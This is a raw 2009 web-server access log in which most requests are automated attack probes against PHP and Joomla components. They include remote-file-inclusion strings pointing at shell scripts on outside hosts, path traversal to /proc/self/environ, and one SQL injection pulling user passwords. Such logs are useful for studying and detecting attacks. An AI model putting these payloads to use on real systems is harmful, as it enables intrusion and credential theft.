77.221.130.2 - - [06/Jun/2009:05:17:11 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.2 - - [06/Jun/2009:05:17:11 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.2 - - [06/Jun/2009:05:17:11 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.2 - - [06/Jun/2009:05:17:11 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:05:17:11 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:05:17:11 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:05:17:12 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 283 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:12 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:12 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 256 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:12 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 283 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:12 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:12 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 256 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:14 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
77.221.130.2 - - [06/Jun/2009:05:17:15 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:05:17:15 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 283 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:17:15 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 283 "-" "XXXXXX"
195.34.78.110 - - [06/Jun/2009:05:17:55 -0400] "GET /logs/access_log.Q109052100/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:18:03 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:18:03 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:18:03 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:18:22 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:05:18:22 -0400] "GET /logs/access_log.Q109050900/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:18:22 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:18:23 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
66.175.122.228 - - [06/Jun/2009:05:18:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:18:38 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:18:38 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:19:06 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:05:19:07 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.38.54.140 - - [06/Jun/2009:05:19:07 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:19:09 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:19:09 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:19:09 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:19:20 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:05:19:31 -0400] "GET /logs/access_log.Q109050900/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
125.131.116.12 - - [06/Jun/2009:05:19:36 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:19:36 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:19:36 -0400] "GET /logs/access_log.Q109051600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:19:36 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:19:46 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:19:55 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.254.243.197 - - [06/Jun/2009:05:19:55 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:20:04 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:05:21:12 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:21:26 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:05:21:52 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:05:21:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [06/Jun/2009:05:22:04 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:05:22:07 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:05:22:09 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:05:22:10 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.15.254.22 - - [06/Jun/2009:05:22:50 -0400] "GET /write.php?dir=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
121.165.73.157 - - [06/Jun/2009:05:22:58 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.80.195.44 - - [06/Jun/2009:05:22:59 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; (none); SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
222.239.76.25 - - [06/Jun/2009:05:23:33 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:23:33 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:23:33 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.15.254.22 - - [06/Jun/2009:05:23:41 -0400] "GET /logs/error_log.Q109051800/write.php?dir=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:05:23:50 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
94.23.200.54 - - [06/Jun/2009:05:23:58 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:23:58 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:23:58 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.208.21.7 - - [06/Jun/2009:05:24:13 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.208.21.7 - - [06/Jun/2009:05:24:13 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.208.21.7 - - [06/Jun/2009:05:24:13 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:05:24:34 -0400] "GET /logs/access_log.Q109052300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.15.48.60 - - [06/Jun/2009:05:24:50 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:24:50 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:24:50 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:24:50 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
66.175.122.228 - - [06/Jun/2009:05:25:01 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:05:25:05 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.169.210.130 - - [06/Jun/2009:05:25:17 -0400] "GET /logs/error_log.Q109051300/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:25:20 -0400] "GET /components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
217.169.210.130 - - [06/Jun/2009:05:25:20 -0400] "GET /logs/components/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
190.144.44.36 - - [06/Jun/2009:05:25:25 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.geocities.com/dedet_hot/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:26:05 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:26:05 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:26:05 -0400] "GET /modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:26:11 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.73.2 - - [06/Jun/2009:05:26:25 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.d1011163-2.cp.blacknight.com/components/com_agora/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:05:26:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [06/Jun/2009:05:26:53 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:26:53 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:26:53 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.15.48.60 - - [06/Jun/2009:05:27:16 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:27:16 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:27:16 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:27:22 -0400] "GET /logs/access_log.Q109050300%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.810"
67.15.48.60 - - [06/Jun/2009:05:27:29 -0400] "GET /logs/error_log.Q109042900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.herb-music.de/funkdad/photos/sylvester0708/idilegal.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
222.239.76.25 - - [06/Jun/2009:05:27:59 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:27:59 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:27:59 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:28:04 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:28:09 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:35 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:35 -0400] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:35 -0400] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 4371 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:37 -0400] "GET //?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:37 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.172.225.50 - - [06/Jun/2009:05:28:38 -0400] "GET /logs//?_zb_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 200 4371 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:05:28:38 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:05:28:38 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:05:28:38 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:28:38 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:28:39 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 283 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:28:39 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 256 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:28:39 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 256 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:28:39 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 283 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:28:40 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:05:28:40 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:05:28:40 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:28:41 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
